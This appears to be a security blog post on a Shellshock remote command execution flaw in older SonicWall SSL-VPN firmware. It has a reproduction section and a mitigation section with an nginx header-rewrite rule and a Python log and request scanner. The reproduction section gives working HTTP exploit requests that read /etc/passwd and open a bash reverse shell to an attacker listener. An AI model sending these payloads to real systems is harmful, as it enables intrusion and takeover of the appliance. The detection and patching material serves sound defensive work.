SonicWall SSL-VPN Remote Command Execution Vulnerability

I. Vulnerability description

Older SonicWall SSL-VPN firmware contains a remote command execution vulnerability, and exploit scripts for it are public. The appliance ships an old kernel together with a bash-based HTTP CGI handler (/cgi-bin/jarrewrite.sh), so the classic Shellshock bash bug applies: the CGI layer exports request headers as environment variables, and a header value that begins with a bash function definition, () { :; };, is parsed and the trailing commands are executed. An attacker can therefore craft a malicious HTTP header, run arbitrary commands remotely, and take control of the host. Affected versions: SSL-VPN / SMA firmware earlier than 8.0.0.4.

II. Vulnerability reproduction

Exploit request (Exp):

GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host: thelostWorld:8080
User-Agent: () { :; }; echo ; /bin/bash -c "cat /etc/passwd"
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

Sending the request runs cat /etc/passwd on the appliance and the file contents come back in the HTTP response:

Reverse shell

Replacing the command with a bash reverse shell (nohup keeps it alive after the CGI returns; thelostworld:8080 is the attacker's listener):

GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host: thelostWorld:8080
User-Agent: () { :; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/thelostworld/8080 0>&1 &"
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

Shell obtained on the listener:

A simple verification script:

Running it prints:

III. Mitigation and remediation

Permanent fix

Upgrade SonicWall SMA / SSL-VPN firmware to 8.0.0.4 or later.

Temporary mitigation

Inspect incoming HTTP headers before they reach the appliance.

The characteristic string of the payload is a bash function definition at the start of a header value, () { :; }; (spacing varies, e.g. () {:;};). Any request header can carry it, not only User-Agent, because the CGI layer exports every header as an environment variable.

Enforce header filtering with an nginx reverse proxy in front of the appliance. The configuration below overwrites User-Agent on the vulnerable CGI path; add further proxy_set_header lines for other headers (Referer, Cookie and so on) as needed, since the payload works in any header that reaches the CGI.

location /cgi-bin/jarrewrite.sh {
    proxy_pass http://your-ssl-vpn:your-ssl-vpn-port$request_uri;
    proxy_set_header Host $http_host;
    # replace the attacker-controlled header before it reaches the CGI
    proxy_set_header User-Agent "sonicwall ssl-vpn rce fix";
}
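As an added example of the header check described above (not code from the post, SonicWall, or nginx), the Python below looks for the () { feature string in two places: every header of a raw HTTP request, which covers headers the nginx rule above does not rewrite, and the User-Agent and Referer fields of combined-format access log lines, which is what a proxy or the appliance's own web server typically records. The regular expressions, the log format assumption and the sample log lines are constructed for the example; the client addresses are documentation ranges.

```python
import re
from typing import Dict, List, Tuple

# Feature string from the post: a bash function definition at the start of a
# header value. Matching the "() {" prefix catches spacing variants such as
# "() {:;};" and "() { :; };".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def find_shellshock_headers(raw_request: str) -> List[Tuple[str, str]]:
    """Return (name, value) for every header of a raw HTTP request that carries
    the Shellshock prefix. All headers are checked, not only User-Agent: the CGI
    layer exports each of them as an environment variable, so any one can trigger
    the bug.
    """
    head = raw_request.split("\r\n\r\n", 1)[0]
    hits = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and SHELLSHOCK_RE.search(value):
            hits.append((name.strip(), value.strip()))
    return hits


# Assumed log layout: combined format as written by nginx/Apache by default
# (client, ident, user, [time], "request", status, bytes, "referer", "user-agent").
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "(.*)"$'
)


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Flag combined-format access log lines whose User-Agent or Referer carries
    the Shellshock prefix. Only those two headers are logged by default, so the
    request-level check above is still needed for headers such as Cookie.
    """
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request, status, referer, ua = m.groups()
        if SHELLSHOCK_RE.search(ua):
            field = "User-Agent"
        elif SHELLSHOCK_RE.search(referer):
            field = "Referer"
        else:
            continue
        alerts.append({"ip": ip, "request": request,
                       "status": int(status), "field": field})
    return alerts


# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" '
    '200 512 "-" "() { :; }; echo ; /bin/bash -c id"',
    '198.51.100.7 - - [10/Oct/2020:13:56:01 +0000] "GET /cgi-bin/welcome HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/80.0"',
    '203.0.113.5 - - [10/Oct/2020:13:57:12 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" '
    '200 0 "() { :; }; echo; /usr/bin/id" "curl/7.68.0"',
]

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

A 200 status on the CGI path with the feature string in any header is the signature to alert on; the nginx rule above stops the User-Agent vector but would leave a Cookie or Referer carrying the same string untouched unless those headers are rewritten as well.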

Reference:

My.oschina.net/u/4600927/b…

Disclaimer: The tools and procedures (methods) provided on this site may be offensive in nature and are intended only for security research and teaching; use them at your own risk.

Copyright belongs to the author. For commercial reproduction please contact the author for authorization; for non-commercial reproduction please credit the source.
